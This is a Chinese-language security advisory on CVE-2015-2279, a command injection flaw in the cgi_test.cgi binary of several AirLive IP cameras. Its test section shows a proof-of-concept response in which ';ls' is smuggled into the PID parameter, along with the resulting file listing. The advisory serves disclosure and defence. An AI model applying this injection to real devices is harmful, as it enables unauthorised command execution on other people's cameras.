AirLive IP监视器命令注入漏洞(CVE-2015-2279)


AirLive IP监视器命令注入漏洞(CVE-2015-2279)


发布日期:2015-07-08
更新日期:2015-07-10

受影响系统:

Airlive IP Cameras MD-3025
Airlive IP Cameras BU-3026
Airlive IP Cameras BU-2015

描述:

CVE(CAN) ID: CVE-2015-2279

Airlive是IP监控网络解决方案提供商、安全产品厂商。

AirLive MD-3025, BU-3026, BU-2015相机在处理某些参数时,cgi_test.cgi二进制文件中存在OS命令注入漏洞,攻击者通过向该文件发送构造的请求,利用此漏洞可注入任意命令。

<*来源:Core Security
 
  链接:http://www.securityfocus.com/archive/1/535938
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-c => set system MAC address
-m [MAC] => write MAC address
-n [Model Name] => write Model Name
-h [HW Version] => write HW Version
-v [Firmware Version] => write Firmware Version
-s [SN] => write SN
-t [TAN] => write TAN
-d [PID] => write PID
-r [CR] => write Country Region
-p => show current info.

Content-type: text/html

< body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]

建议:

厂商补丁:

Airlive
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.airlivesecurity.com/


[1] http://www.airlive.com.
[2] http://www.airlive.com/product/BU-2015.
[3] http://www.airlive.com/product/MD-3025.
[4] http://www.airlive.com/product/BU-3026.
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php?id=5#.

本文永久更新链接地址

相关内容

    暂无相关文章